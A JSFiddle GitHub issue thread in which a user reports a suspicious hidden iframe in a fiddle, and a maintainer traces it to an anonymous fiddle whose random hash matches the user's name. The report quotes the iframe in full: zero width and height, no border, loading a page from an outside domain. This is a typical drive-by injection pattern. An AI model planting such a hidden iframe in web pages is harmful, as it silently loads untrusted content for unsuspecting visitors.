### ISSUE TITLE
iframe virus?

### ISSUE THREAD

**Issue by omer4d** [jsfiddle/jsfiddle-issues#713]
Just started JSFiddle, but instead of getting a blank page, the HTML source pane contained a mysterious iframe leading to some suspicious website. Looks very much like a virus. Is this a server-side infection or something on my computer?

**Comment by oskarkrawczyk** [comment]
Link?

**Comment by omer4d** [comment]
https://jsfiddle.net/StasB/

This is what I see every time:

<iframe name="namchp" width=0 height=0 src="http://akillitelefonburada.com/yon.html" scrolling="no" frameborder="0"></iframe>

**Comment by oskarkrawczyk** [comment]
That's nothing on our end. Have you tried a different browser, incognito, or a different network?

**Comment by omer4d** [comment]
You mean you don't see it when you open the link? It happens in both Firefox and Chrome, and incognito mode. I don't have a different network to test on right now.

**Comment by oskarkrawczyk** [comment]
It does happen when I open https://jsfiddle.net/StasB/, but that's normal since it's the content of that fiddle.

It does not happen on https://jsfiddle.net/ as you've mentioned in the ticket message.

**Comment by omer4d** [comment]
Yes, you're right. It's what the browser autocomplete feature returns. However, all of my actual saved fiddles have the same format as this: https://jsfiddle.net/StasB/hnavc98a/13/
I have no idea what that link is supposed to represent, but erasing the iframe and opening the page again doesn't remove it, and pressing the update button creates a new fiddle with the normal format:
https://jsfiddle.net/StasB/StASB/1/

**Comment by oskarkrawczyk** [comment]
Perhaps just clear the autocomplete history in your browser.

**Comment by omer4d** [comment]
Okay, but this doesn't explain anything. This thing is clearly on your server, not on my machine. It has my username in it, but I did not create it and the link has different form from normal user-created fiddles... Do you mean to tell me it's just a randomly generated name for an anonymous fiddle that happens to exactly correspond to my username?

**Comment by oskarkrawczyk** [comment]
It's absolutely possible that the randomly generated hash for an anonymous fiddle is the same as your username.

**Comment by omer4d** [comment]
Fair enough. Sorry to waste your time.
